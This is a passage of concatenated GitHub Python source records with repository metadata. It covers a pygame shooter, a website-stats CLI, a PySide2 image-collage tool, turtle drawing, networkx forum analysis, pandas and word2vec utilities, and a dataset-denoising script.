update(self, *arg, **kwargs) -> None:\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n self.rect.left -= 5\n if self.rect.left < 0:\n self.rect.left = 0\n if keys[pygame.K_RIGHT]:\n self.rect.right += 5\n if self.rect.right > GAME_WIDTH:\n self.rect.right = GAME_WIDTH\n if keys[pygame.K_UP]:\n now = datetime.now()\n if now - self.last_shot < BETWEEN_SHOTS:\n return\n print(\"Пиу-пиу\")\n bullet = Bullet(self, self.aliens, self.gamers, self.game_over)\n self.last_shot = now\n self.gamers.add(bullet)\n","repo_name":"Nastya-Arshba/space-invaders","sub_path":"gamer.py","file_name":"gamer.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"45745592058","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis module receives the command line input from the user in the form:\nexecutable_python_file arguments...\nAnd then delegates the command functionalities to the respective action modules\n\n\"\"\"\n\nimport argparse\nfrom command_functions.call_crawler import call_crawler\nfrom command_functions.call_list_reports import call_list_reports\nfrom command_functions.call_link_reports import call_link_reports\nimport rlcompleter\nimport os\nimport sys\nimport config\n\npath = os.getcwd()\nsys.path.append('/'.join([path, 'web_crawler']))\n\ndef invalid_command() -> None:\n print(\"Invalid command entered..\")\n \nif __name__ == \"__main__\":\n \"\"\"\n This function receives the command line arguments from the user and passes the arguments to the corresponding modules to be processed\n \"\"\"\n\n parser = argparse.ArgumentParser(\"Processing input commands\")\n\n subparsers = parser.add_subparsers(help='commands', dest = \"input_command\")\n\n # A crawl command\n crawl_parser = subparsers.add_parser('crawl', help='crawl website')\n crawl_parser.add_argument('url', help='The website url to be crawled')\n\n # A list-reports command\n list_reports_parser = subparsers.add_parser('list-reports', help='lists all the websites crawled')\n\n # A link-reports command\n link_reports_parser = subparsers.add_parser('link-reports', help='shows the statistics of the website')\n link_reports_parser.add_argument('report-id', help='report id of the website')\n link_reports_parser.add_argument('--no-cmd', action = 'store_true',\n help='It does not prints the statistics of website in the command line')\n link_reports_parser.add_argument('--yaml', action = 'store_true',\n help='Gives the statisctics of website in yaml format')\n link_reports_parser.add_argument('--csv', action = 'store_true',\n help='Gives the statisctics of website in csv format')\n link_reports_parser.add_argument('--json', action = 'store_true',\n help='Gives the statisctics of website in json format')\n\n arguments=parser.parse_known_args()\n config.logger.info(\"Arguments recieved from command line.\")\n \n #argument-value dictionary\n commands = vars(arguments[0])\n \n if len(arguments[1]) != 0: \n print(\"Too many arguments provided!\")\n sys.exit()\n\n # argument-function dictionary\n functions = {\n \"crawl\" : call_crawler,\n \"list-reports\" : call_list_reports,\n \"link-reports\" : call_link_reports\n }\n \n if commands[\"input_command\"] in functions:\n call_function = commands.pop('input_command')\n functions.get(call_function)(commands)\n else:\n invalid_command() \n \n ","repo_name":"Rohit102497/Command_Line_Utility","sub_path":"website-stats.py","file_name":"website-stats.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2525959395","text":"#!/usr/bin/env python3\n\"\"\"\n Launch GUI to create mirrored tiled images from source image file.\n \n File: collager.py\n Author: Suzanne Berger\n Date created: 03/15/2018\n Updated: 05/16/2022\n Python Version: 3.9\n\"\"\"\n\nimport sys\nimport os\nimport logging\nfrom pprint import pprint\n\nfrom PySide2 import QtCore, QtGui, QtWidgets\nfrom PySide2 import QtUiTools\n\n#########################################################\n# globals\n#########################################################\n\nVERSION = \"V02\"\n\nlogging.basicConfig(level=logging.INFO)\nlogging.info(f\" {sys.argv[0]} Version {VERSION}\")\n\n#########################################################\n# CollagerWin\n#########################################################\n\nclass CollagerWin(QtWidgets.QWidget):\n\n def __init__(self, parent=None):\n \"\"\" Create CollagerWin object inherited from QWidget. \"\"\"\n QtWidgets.QWidget.__init__(self, parent)\n \n # initialize object attributes\n # tiled images are stored in dictionary before saving to files\n self.cllimagemap = {}\n self.image_dir = self.image_file = None\n self.empty_pixmap = QtGui.QPixmap(300, 200)\n self.empty_pixmap.fill(QtGui.QColor(120, 120, 160))\n \n # initialize user interface and signal slot connections\n self._initUI()\n self._connectSignals()\n self.show()\n\n def _initUI(self):\n \"\"\" Create widgets and layout. \"\"\"\n self.setGeometry(100, 100, 800, 700)\n self.setWindowTitle('Collager')\n \n self.src_label = QtWidgets.QLabel('Source Image File')\n self.src_label.setFixedSize(131,21)\n self.src_lineEdit = QtWidgets.QLineEdit()\n self.src_lineEdit.setFixedHeight(21)\n self.src_lineEdit.setMinimumWidth(500)\n self.src_button = QtWidgets.QPushButton('Browse')\n self.src_button.setFixedSize(91, 35)\n\n src_layout = QtWidgets.QHBoxLayout()\n src_layout.addWidget(self.src_label)\n src_layout.addWidget(self.src_lineEdit)\n src_layout.addWidget(self.src_button)\n\n headBox = QtWidgets.QGroupBox()\n headBox.setFixedHeight(60)\n headBox.setMinimumWidth(740)\n headBox.setLayout(src_layout)\n \n imageFrame = QtWidgets.QGroupBox()\n imageFrame.setMinimumSize(760, 600)\n \n # QGroupBox labels denote image tile pattern\n self.cllbox0 = QtWidgets.QGroupBox('N-H-V-HV')\n self.mkbox('cll0', self.cllbox0)\n \n self.cllbox1 = QtWidgets.QGroupBox('H-N-HV-V')\n self.mkbox('cll1', self.cllbox1)\n\n self.cllbox2 = QtWidgets.QGroupBox('V-HV-N-H')\n self.mkbox('cll2', self.cllbox2)\n \n self.cllbox3 = QtWidgets.QGroupBox('HV-V-H-N')\n self.mkbox('cll3', self.cllbox3)\n \n cll_layout = QtWidgets.QGridLayout()\n cll_layout.addWidget(self.cllbox0, 0, 0)\n cll_layout.addWidget(self.cllbox1, 0, 1)\n cll_layout.addWidget(self.cllbox2, 1, 0)\n cll_layout.addWidget(self.cllbox3, 1, 1)\n imageFrame.setLayout(cll_layout)\n \n status_label = QtWidgets.QLabel('Status')\n status_label.setFixedSize(61,21)\n self.status_lineEdit = QtWidgets.QLineEdit(\"Ready:\")\n self.status_lineEdit.setFixedHeight(21)\n self.status_lineEdit.setMinimumWidth(600)\n status_layout = QtWidgets.QHBoxLayout()\n status_layout.addWidget(status_label)\n status_layout.addWidget(self.status_lineEdit)\n \n self.buttonbox = QtWidgets.QDialogButtonBox(QtWidgets.QDialogButtonBox.Save |\n QtWidgets.QDialogButtonBox.Reset |\n QtWidgets.QDialogButtonBox.Close)\n \n mainLayout = QtWidgets.QVBoxLayout()\n mainLayout.addWidget(headBox)\n mainLayout.addWidget(imageFrame)\n mainLayout.addLayout(status_layout)\n mainLayout.addWidget(self.buttonbox)\n self.setLayout(mainLayout)\n \n def _connectSignals(self):\n \"\"\" Create signal slot connections. \"\"\"\n self.src_button.clicked.connect(self.on_src_clicked)\n self.buttonbox.rejected.connect(self.close)\n self.buttonbox.button(QtWidgets.QDialogButtonBox.Save).clicked.connect(self.save)\n self.buttonbox.button(QtWidgets.QDialogButtonBox.Reset).clicked.connect(self.reset)\n \n def closeEvent(self, event):\n event.accept()\n \n def save(self):\n \"\"\" Save checked tiled images into same directory as source image file. \"\"\"\n if self.image_dir is None:\n self.status_lineEdit.setText(\"Unable to save without directory setting\")\n return\n \n self.status_lineEdit.setText(f\"Saving collages to directory: {self.image_dir}\")\n \n # iterate through dictionary to get each QGroupBox object and tiled QImage\n # only save QImage if QGroupBox object is checked\n for cllkey, value in self.cllimagemap.items():\n this_groupBox = value[0]\n if this_groupBox.isChecked():\n this_lineEdit_objectname = f\"{cllkey}_lineEdit\"\n this_lineEdit = this_groupBox.findChild(QtWidgets.QLineEdit, this_lineEdit_objectname)\n this_path = os.path.normpath(os.path.join(self.image_dir, this_lineEdit.text()))\n this_image = value[-1]\n this_image.save(this_path, quality=100)\n logging.info(f\"Saving collage {cllkey} to image file {this_path}\")\n \n self.status_lineEdit.setText(f\"Successfully saved all collages to {self.image_dir}\")\n \n def reset(self):\n \"\"\" Reset GUI by clearing entries and setting image boxes to original solid grey. \"\"\"\n logging.info(\"Resetting collage window\")\n self.src_lineEdit.clear()\n self.image_dir = self.image_file = None\n for cllkey, value in self.cllimagemap.items():\n this_groupBox = self.cllimagemap[cllkey][0]\n this_groupBox.setChecked(True)\n self.cllimagemap[cllkey] = [this_groupBox]\n \n this_lineEdit_objectname = f\"{cllkey}_lineEdit\"\n this_lineEdit = this_groupBox.findChild(QtWidgets.QLineEdit, this_lineEdit_objectname)\n this_lineEdit.clear()\n \n this_label_objectname = f\"{cllkey}_label\"\n this_label = this_groupBox.findChild(QtWidgets.QLabel, this_label_objectname)\n this_label.setPixmap(self.empty_pixmap)\n \n self.status_lineEdit.setText(\"Ready:\")\n\n def on_src_clicked(self):\n \"\"\" Launch file selection dialog to load source image to be tiled. \"\"\"\n self.srcfile = QtWidgets.QFileDialog.getOpenFileName(self,'Load Image File','/Users/suzanneberger/Pictures',\n \"image files (*.jpg *.png *.tif)\")[0]\n\n if self.srcfile is not None:\n self.src_lineEdit.setText(self.srcfile)\n self.image_dir,self.image_file = os.path.split(self.srcfile)\n self.mkcllpix()\n\n def mkbox(self, cllkey, this_groupBox):\n \"\"\" Setup QGroupBox to contain tiled image and checkable label.\n \n QGroupBox object is stored in dictionary with object name derived from dictionary key.\n \"\"\"\n self.cllimagemap[cllkey] = [this_groupBox]\n this_groupBox.setCheckable(True)\n this_groupBox.setChecked(True)\n this_groupBox.setObjectName(f\"{cllkey}_groupBox\")\n\n this_lineEdit = QtWidgets.QLineEdit()\n this_lineEdit.setFixedHeight(21)\n this_lineEdit.setFixedWidth(300)\n this_lineEdit.setObjectName(f\"{cllkey}_lineEdit\")\n \n this_label = QtWidgets.QLabel()\n this_label.setPixmap(self.empty_pixmap)\n this_label.setObjectName(f\"{cllkey}_label\")\n \n this_layout = QtWidgets.QVBoxLayout()\n this_layout.addWidget(this_lineEdit)\n this_layout.addWidget(this_label)\n this_groupBox.setLayout(this_layout)\n\n def mkcllpix(self):\n \"\"\" Set each QGroupBox to image tiled from source image. \"\"\"\n \n # first create as QImage objects saved in dictionary\n self.build_collages()\n \n # then set each QImage to QPixMap assigned to QGroupBox's QLabel object\n for i in range(4):\n cllkey = 'cll%d' % i\n if cllkey not in self.cllimagemap:\n print(\"should raise exception\")\n continue\n \n this_groupBox = self.cllimagemap[cllkey][0]\n \n parts = self.image_file.split('.')\n parts[0] = parts[0] + '_' + cllkey\n this_cll_file = '.'.join(parts)\n this_lineEdit_objectname = \"%s_lineEdit\" % cllkey\n this_lineEdit = this_groupBox.findChild(QtWidgets.QLineEdit, this_lineEdit_objectname)\n this_lineEdit.setText(this_cll_file)\n \n this_image = self.cllimagemap[cllkey][-1]\n this_pixmap = QtGui.QPixmap(this_image).scaledToWidth(300)\n \n this_label_objectname = \"%s_label\" % cllkey\n this_label = this_groupBox.findChild(QtWidgets.QLabel, this_label_objectname)\n\n if this_label is None:\n print(\"should raise exception\")\n continue\n\n this_label.setPixmap(this_pixmap)\n\n\n def build_collages(self):\n \"\"\" Draw tiled source image in all patterns and save each in dictionary. \"\"\"\n src_image = QtGui.QImage(self.srcfile)\n src_imageH = src_image.mirrored(True, False)\n src_imageV = src_image.mirrored(False, True)\n src_imageHV = src_image.mirrored(True, True)\n \n patterns = [[src_image, src_imageH, src_imageV, src_imageHV],\n [src_imageH, src_image, src_imageHV, src_imageV],\n [src_imageHV, src_imageV, src_imageH, src_image],\n [src_imageV, src_imageHV, src_image, src_imageH],\n ]\n \n src_width = src_image.width()\n src_height = src_image.height()\n target_width = src_width * 2\n target_height = src_height * 2\n \n src_images = []\n self.collages = []\n for i in range(4):\n src_images = patterns[i]\n target_image = QtGui.QImage(target_width, target_height, QtGui.QImage.Format_ARGB32_Premultiplied)\n painter = QtGui.QPainter(target_image)\n painter.drawImage(0, 0, src_images[0])\n painter.drawImage(src_width-1, 0, src_images[1])\n painter.drawImage(0, src_height-1, src_images[2])\n painter.drawImage(src_width-1, src_height-1, src_images[3])\n \n cllkey = 'cll%d' % i\n if cllkey in self.cllimagemap:\n self.cllimagemap[cllkey].append(target_image)\n logging.info(\"Adding collage %s to image map\" % cllkey)\n else:\n print(\"should raise exception\")\n continue\n \n painter.end()\n\n\n\n#########################################################\n# main\n#########################################################\n\nif __name__ == '__main__':\n\n app = QtWidgets.QApplication(sys.argv)\n cllwin = CollagerWin()\n sys.exit(app.exec_())\n\n\n","repo_name":"skoshiwosh/collager","sub_path":"collager.py","file_name":"collager.py","file_ext":"py","file_size_in_byte":11370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37839913467","text":"import turtle\nimport tkinter as tk\n\n# Draw the square\ndef draw_square():\n t = turtle.Turtle()\n t.penup()\n t.goto(-50, -50) # Starting point of the square\n t.pendown()\n t.pensize(2)\n for _ in range(4):\n t.forward(100) # Length of each side of the square\n t.left(90)\n t.hideturtle()\n\n# Draw the inscribed circle\ndef draw_circle():\n t = turtle.Turtle()\n t.penup()\n t.goto(0, -50) # Center point of the circle\n t.pendown()\n t.circle(50) # Radius of the circle\n t.hideturtle()\n\n# Create the Tkinter window\nwindow = tk.Tk()\n\n# Create the buttons\nstart_button = tk.Button(window, text=\"Start\")\nstop_button = tk.Button(window, text=\"Stop\")\npause_button = tk.Button(window, text=\"Pause\")\n\n# Set the layout using the grid system\nstart_button.grid(row=0, column=0)\nstop_button.grid(row=0, column=1)\npause_button.grid(row=0, column=2)\n\n# Adjust the spacing between buttons\nwindow.grid_columnconfigure(1, minsize=100) # Space between Start and Stop buttons\nwindow.grid_columnconfigure(2, minsize=100) # Space between Stop and Pause buttons\n\n# Call the functions to draw the square and inscribed circle\ndraw_square()\ndraw_circle()\n\n# Run the Tkinter event loop\nwindow.mainloop()\n\n# Close the turtle graphics window\nturtle.done()\n","repo_name":"Kunalpawar3224/hellogit","sub_path":"ncircle/ncircle_geometry/eleventh_assi.py","file_name":"eleventh_assi.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33902490454","text":"s=input()\r\nc=input()\r\nl3=[]\r\nl1=list(s.strip(\" \"))\r\nl2=list(c.strip(\" \"))\r\nfor i in l1:\r\n j=i.lower()\r\n while((i in l2) or (j in l2)):\r\n if(i.isdigit()):\r\n l3.append(i)\r\n else:\r\n if(i in l2):\r\n print(i,end=\"\")\r\n elif(j in l2):\r\n print(j,end=\"\")\r\n if(i in l2):\r\n l2.remove(i)\r\n else:\r\n l2.remove(j)\r\nfor i in l3:\r\n print(i,end=\"\")","repo_name":"prateekgupta2024/Practice-Questions","sub_path":"problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1679776858","text":"# -*- coding: utf-8 -*-\nfrom pandas import DataFrame,Series\nimport pandas.io.sql as psql\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport json, io,db\nimport networkx as nx\nfrom networkx.readwrite import json_graph\nfrom datetime import *\nimport community\n#############################################################################################################\ndef social_network():\n foros=db.mySQLConect(\"localhost\",\"root\",\"lego\",\"rita\")\n msg= psql.frame_query('select * from message;', foros.db)\n edges=[]\n\n for idx,m in msg[msg.referedTo.notnull()].iterrows():\n if(m['date']<datetime.strptime('08/01/11', \"%m/%d/%y\").date()): \n course='2010-2011'\n elif(m['date']<datetime.strptime('08/01/12', \"%m/%d/%y\").date()): \n course='2011-2012'\n sender=long(m['sender'])\n receiver=long(msg[msg.idMessage==m['referedTo']]['sender'])\n edges.append((sender,receiver))\n else:\n course='2012-2013'\n graph=nx.DiGraph()\n for (x,y) in edges:\n if graph.edges().count((x,y))==0:\n graph.add_edge(x,y,weight= edges.count((x,y)))\n \n partition = community.best_partition(nx.Graph(graph))\n for n in partition.keys():\n graph.node[n][\"group\"]=partition[n]\n return graph \n#############################################################################################################\ndef gen_network_json(graph):\n\n data=dict(nodes=graph.nodes(data=True), edges=graph.edges(data=True))\n #data=json_graph.node_link_data(graph)\n with io.open('C:/Users/Llanos/Documents/GitHub/AutoESDashboard/html/data/network.json', 'w', encoding='utf-8') as f:\n f.write(unicode(json.dumps(data, ensure_ascii=False)))\n \n#############################################################################################################\ndef social_parameters():\n g=social_network()\n\n\n degree=DataFrame(nx.degree_centrality(g).values(),index=g.nodes(),columns=['degree'])\n #closeness=DataFrame(nx.closeness_centrality(g,normalized=True).values(),index=g.nodes(),columns=['closeness'])\n between=DataFrame(nx.betweenness_centrality(g,normalized=True).values(),index=g.nodes(),columns=['between'])\n eigen=DataFrame(nx.eigenvector_centrality(g).values(),index=g.nodes(),columns=['eigen'])\n clustering=DataFrame(nx.clustering(nx.Graph(g)).values(),index=g.nodes(),columns=['clustering'])\n\n #data=pd.merge(degree,pd.merge(between,pd.merge(eigen,clustering)))\n data=degree.join(between.join(eigen.join(clustering)))\n return data\n############################################################################################################\ncomputed_social=social_parameters()\n","repo_name":"LlanosTobarra/AutoESDashboard","sub_path":"sna.py","file_name":"sna.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19626953733","text":"import pandas as pd\nimport numpy as np\nimport os as os\nimport requests as rq\nimport pickle as pkl\nimport gensim as gs\nimport sys as sy\nimport sqlalchemy as sq\n\ndef read_db(database_filename, table_name):\n \"\"\"\n Read a db file and return it as a dataframe\n :param database_filename: The DB file path\n :param table_name: The table name\n :return: The dataframe\n \"\"\"\n\n engine = sq.create_engine('sqlite:///' + database_filename)\n return pd.read_sql(table_name, con=engine)\n\ndef to_db(df, database_filename, table_name, index = False):\n \"\"\"\n Save a data frame as a SQLite DB file to the given location with the given table name\n :param df: The data frame to save\n :param database_filename: The DB file to create (NOTE: Will be replaced if it exists)\n :param index: (Optional, Default: False) Whether or not to create an index column in the saved table\n :param table_name: The name of the table to contain the data frame data\n \"\"\"\n\n # If the DB file exists, delete it\n if os.path.exists(database_filename):\n os.remove(database_filename)\n\n # Save data to an sqlite db\n engine = sq.create_engine('sqlite:///' + database_filename)\n df.to_sql(table_name, engine, index=index)\n\ndef widen_df_display():\n \"\"\"\n Widens the way dataframes are printed (setting lifetime is runtime)\n \"\"\"\n\n pd.set_option('display.width', 3000)\n pd.set_option('display.max_columns', 100)\n\ndef try_word2vec(word):\n \"\"\"\n Gets the word vector for the given work based on Google's trained model.\n 1. Tries the cache first\n 2. Loads the model between 0 and 1 times per run (Will download it automatically if necessary)\n 3. Updates cache\n :param word: The word to vectorize\n :return: The (word vector, boolean for success/failure)\n \"\"\"\n\n global google_word2vec_model\n global word2vec_cache\n model_filename = __file__[0:__file__.rindex('\\\\')] + '\\\\..\\\\models\\\\nl\\\\GoogleWord2VecModel.bin'\n cache_filename = __file__[0:__file__.rindex('\\\\')] + '\\\\..\\\\models\\\\nl\\\\word2vec_cache.pkl'\n\n # Check cache\n if word2vec_cache is None:\n if os.path.exists(cache_filename):\n word2vec_cache = read_pkl(cache_filename)\n else:\n word2vec_cache = {}\n to_pkl(word2vec_cache, cache_filename)\n\n # Try cache\n if word in word2vec_cache:\n return word2vec_cache[word], word2vec_cache[word] is not None\n # Use Google's model\n else:\n if google_word2vec_model is None:\n print('Need to load Google word2vec Model')\n\n # Check if model exists, download otherwise\n if not os.path.exists(model_filename):\n print('Google word2vec model not found. Will download (~3.5GB)...')\n download_gdrive_file('1kzCpXqZ_EILFAfK4G96QZBrjtezxjMiO', model_filename) # Hard-coded file id\n print('Done downloading Google word2vec model')\n\n print('Loading Google word2vec model...')\n google_word2vec_model = gs.models.KeyedVectors.load_word2vec_format(model_filename, binary=True)\n print('Done loading Google word2vec model')\n\n try:\n word2vec_cache[word] = google_word2vec_model[word]\n to_pkl(word2vec_cache, cache_filename)\n return word2vec_cache[word], True\n except:\n word2vec_cache[word] = None\n to_pkl(word2vec_cache, cache_filename)\n return word2vec_cache[word], False\n\ndef read_pkl(file_name):\n \"\"\"\n De-serializes a pickle file into an object and returns it\n :param file_name: The name of the pickle file\n :return: The object that is de-serialized\n \"\"\"\n\n with open(file_name, 'rb') as file:\n return pkl.load(file)\n\ndef to_pkl(obj, file_name):\n \"\"\"\n Save the given object as a pickle file to the given file name\n :param obj: The object to serialize\n :param file_name: The file name to save it to\n :return: returns the same object back\n \"\"\"\n\n with open(file_name, 'wb') as file:\n pkl.dump(obj, file)\n\ndef one_hot_encode(df, column_name, prefix = '', replace_column = True, insert_to_end = False):\n \"\"\"\n Performs one hot encoding on the given column in the data and replaces this column with the\n new one hot encoded columns\n :param df: The data frame in question\n :param column_name: The column to one hot encode\n :param prefix: (Optional, Default: column_name) The prefix for the new columns\n :param replace_column: (Optional, Default: True) Whether or not to replace the column to encode\n :param insert_to_end: (Optional, Default: False) Whether or not to add encoded columns at the end\n :return: The same data frame with the specified changes\n \"\"\"\n\n dummies_insertion_index = df.columns.get_loc(column_name)\n dummies = pd.get_dummies(df[column_name], prefix=column_name if prefix == '' else prefix)\n\n if replace_column:\n df = df.drop([column_name], axis=1)\n else:\n dummies_insertion_index += 1\n\n if insert_to_end:\n df = pd.concat([df, dummies], axis=1)\n else:\n for column_to_insert in dummies.columns:\n df.insert(loc=dummies_insertion_index, column=column_to_insert, value=dummies[column_to_insert])\n dummies_insertion_index += 1\n\n return df\n\ndef read_csv(file_path, verbose=True):\n \"\"\"\n Reads a csv file and returns the smallest possible dataframe\n :param file_path: The file path\n :param verbose: Whether or not to be verbose about the memory savings\n :return: An optimized dataframe\n \"\"\"\n\n ret_val = pd.read_csv(file_path)\n return reduce_mem_usage(ret_val, verbose)\n\ndef download_gdrive_file(file_id, output_file_path):\n \"\"\"\n Download a file from Google Drive given its file id\n (Source: https://github.com/nsadawi/Download-Large-File-From-Google-Drive-Using-Python)\n :param file_id: The file id\n :param output_file_path: The path of the output file\n \"\"\"\n\n URL = \"https://docs.google.com/uc?export=download\"\n\n session = rq.Session()\n\n response = session.get(URL, params = { 'id' : file_id }, stream = True)\n token = __get_confirm_token__(response)\n\n if token:\n params = { 'id' : file_id, 'confirm' : token }\n response = session.get(URL, params = params, stream = True)\n\n __save_response_content__(response, output_file_path)\n\ndef whats(thing) :\n \"\"\"\n Prints the type of object passed in\n Parameters:\n thing (Object): The object for which the type needs to be printed\n \"\"\"\n\n print(type(thing))\n\ndef reduce_mem_usage(df, verbose=True):\n \"\"\"\n Takes a dataframe and returns one that takes the least memory possible.\n This works by going over each column and representing it with the smallest possible data structure.\n Example usage: my_data = pd.read_csv('D:/SomeFile.csv').pipe(reduce_mem_usage)\n Source: (https://www.kaggle.com/arjanso/reducing-dataframe-memory-size-by-65)\n Parameters:\n df (DataFrame): The dataframe to optimize\n verbose (bool): Whether or not to be verbose about the savings\n \"\"\"\n\n numerics = [\"int16\", \"int32\", \"int64\", \"float16\", \"float32\", \"float64\"]\n start_mem = df.memory_usage().sum() / 1024 ** 2\n for col in df.columns:\n col_type = df[col].dtypes\n if col_type in numerics:\n c_min = df[col].min()\n c_max = df[col].max()\n if str(col_type)[:3] == \"int\":\n if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:\n df[col] = df[col].astype(np.int8)\n elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64)\n else:\n if (\n c_min > np.finfo(np.float16).min\n and c_max < np.finfo(np.float16).max\n ):\n df[col] = df[col].astype(np.float16)\n elif (\n c_min > np.finfo(np.float32).min\n and c_max < np.finfo(np.float32).max\n ):\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n end_mem = df.memory_usage().sum() / 1024 ** 2\n if verbose:\n print(\n \"Mem. usage decreased to {:5.2f} Mb ({:.1f}% reduction)\".format(\n end_mem, 100 * (start_mem - end_mem) / start_mem\n )\n )\n return df\n\n#region Properties\n\ngoogle_word2vec_model = None\n\nword2vec_cache = None\n\n#endregion\n\n#region Private\n\ndef __get_confirm_token__(response):\n \"\"\"\n Get a confirmation token from Google Drive (that says I'm ok with not scanning for viruses)\n :param response: The HTTP response object\n :return: The token\n \"\"\"\n for key, value in response.cookies.items():\n if key.startswith('download_warning'):\n return value\n\n return None\n\ndef __save_response_content__(response, output_file_name):\n \"\"\"\n Given an HTTP response object and a output file name, save the content to the file\n :param response: The HTTP response object\n :param output_file_name: The path of the output file\n \"\"\"\n\n CHUNK_SIZE = 32768\n file_size = int(response.headers.get('Content-Length')) if response.headers.get('Content-Length') else None\n\n with open(output_file_name, \"wb\") as f:\n i = 1\n for chunk in response.iter_content(CHUNK_SIZE):\n if chunk:\n mb_sofar = CHUNK_SIZE * i / 1024 / 1024\n if file_size:\n percentage = (CHUNK_SIZE * i / file_size * 100)\n sy.stdout.write('\\r' + '[ ]'\n .replace(' ', ':', int(percentage / 2)) + ' ' + str(\n min(int(percentage), 100)) + '% (' + str(round(mb_sofar, 2)) + 'MB)')\n else:\n sy.stdout.write('\\r' + 'Unknown file size. ' + str(round(mb_sofar, 2)) + 'MB downloaded')\n f.write(chunk)\n i += 1\n print('')\n\n#endregion","repo_name":"Ravi5ingh/converse-api","sub_path":"utility/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":10403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21587221229","text":"# -*- coding: utf-8 -*-\n# Author: Xiaoming Qin\n\n\"\"\" Create denoised dataset by clustering. \"\"\"\n\nfrom os.path import join as pjoin\nimport os\nimport random\n\n\ndef denoised_main(cls_id):\n probs_root = \"../data/pred_probs\"\n cluster_root = \"../data/k-means\"\n noisy_root = \"../data/noisy\"\n save_root = \"../data/denoised\"\n lbl_map_file = \"../data/labels_queries_map.txt\"\n\n with open(lbl_map_file, 'r') as f:\n lines = f.readlines()\n\n lbl_map = {}\n for l in lines:\n idx, name = l.split(' ')[0:2]\n lbl_map[str(idx)] = name\n\n # For data cleaner noisy data\n with open(pjoin(noisy_root, lbl_map[cls_id] + '.txt'), 'r') as f:\n lines = f.readlines()\n\n noisy_list = set([l.strip('\\n') + \".jpg\" for l in lines])\n\n name_list = []\n\n with open(pjoin(probs_root, cls_id + '.lst'), 'r') as f:\n lines = f.readlines()\n\n name_list = [l.split(' ')[0] for l in lines]\n probs_list = [float(l.split(' ')[1]) for l in lines]\n\n with open(pjoin(cluster_root, cls_id + '.lst'), 'r') as f:\n lines = f.readlines()\n\n cluster_list = [int(l.split(' ')[1]) for l in lines]\n\n clean_labels = set([1, 2])\n\n new_arr = []\n\n counter_clean = 0\n counter_noisy = 0\n\n for i in range(len(name_list)):\n if cluster_list[i] in clean_labels \\\n and probs_list[i] >= 0.5:\n # and (name_list[i] not in noisy_list):\n new_arr.append((name_list[i], 1))\n counter_clean += 1\n else:\n new_arr.append((name_list[i], 0))\n counter_noisy += 1\n\n print(len(name_list))\n print(counter_clean)\n print(counter_noisy)\n\n with open(pjoin(save_root, cls_id + '.lst'), 'wb') as f:\n for i in range(len(new_arr)):\n f.write(\"{} {} {}\\n\".format(\n new_arr[i][0], new_arr[i][1], new_arr[i][1]))\n\n\ndef over_sampling(data_list, target_num):\n random.seed(0)\n dst_list = []\n for i in range(target_num - len(data_list)):\n dst_list.append(random.choice(data_list))\n\n return dst_list\n\n\ndef create_final_dataset():\n src_train_f = \"../data/train_q10.lst\"\n dst_train_f = \"../data/train_q10_denos.lst\"\n\n denos_root = \"../data/denoised\"\n\n arr = [[] for _ in range(40)]\n\n with open(src_train_f, 'r') as f:\n lines = f.readlines()\n\n for l in lines:\n idx, name = l.strip('\\n').split(' ')\n arr[int(idx)].append(name)\n\n over_sam_fld = \"../data/over_samp\"\n\n for fname in os.listdir(denos_root):\n cls_id = int(fname.split('.')[0])\n\n with open(pjoin(denos_root, fname), 'r') as f:\n lines = f.readlines()\n\n repl = []\n\n for l in lines:\n name, label = l.strip('\\n').split(' ')[0:2]\n name = name[:-4]\n label = int(label)\n if label == 1:\n repl.append(name)\n\n print(\"{}: old {}\".format(cls_id, len(arr[cls_id])))\n\n over_repl = over_sampling(repl, len(arr[cls_id]))\n\n print(len(over_repl))\n\n with open(pjoin(over_sam_fld, fname), 'w') as f:\n for i in range(len(over_repl)):\n f.write(\"{}.jpg\\n\".format(over_repl[i]))\n\n arr[cls_id] = repl\n\n print(\"{}: new {}\".format(cls_id, len(arr[cls_id])))\n\n # for i in range(40):\n # print(\"{}: {}\".format(i, len(arr[i])))\n\n with open(dst_train_f, 'w') as f:\n for i in xrange(40):\n for j in xrange(len(arr[i])):\n f.write(\"{} {}\\n\".format(i, arr[i][j]))\n\n\nif __name__ == \"__main__\":\n cls_id = 26\n # denoised_main(str(cls_id))\n create_final_dataset()\n","repo_name":"xiaoming-qxm/webvision","sub_path":"tools/crt_denoised_dset.py","file_name":"crt_denoised_dset.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"34599410436","text":"from django.http import HttpResponse, JsonResponse\r\nfrom django.db.models import Q\r\nfrom django.views.generic import UpdateView\r\nfrom rest_framework import permissions\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom rest_framework.parsers import JSONParser\r\nfrom users.models import User\r\nfrom .models import Message, Course, Opinions, File, Annoucement, Grade, Task, Classes, UserClasses, UserCourse, User_Tasks_Files\r\nfrom .serializers import MessageSerializer, CourseSerializer, OpinionsSerializer, 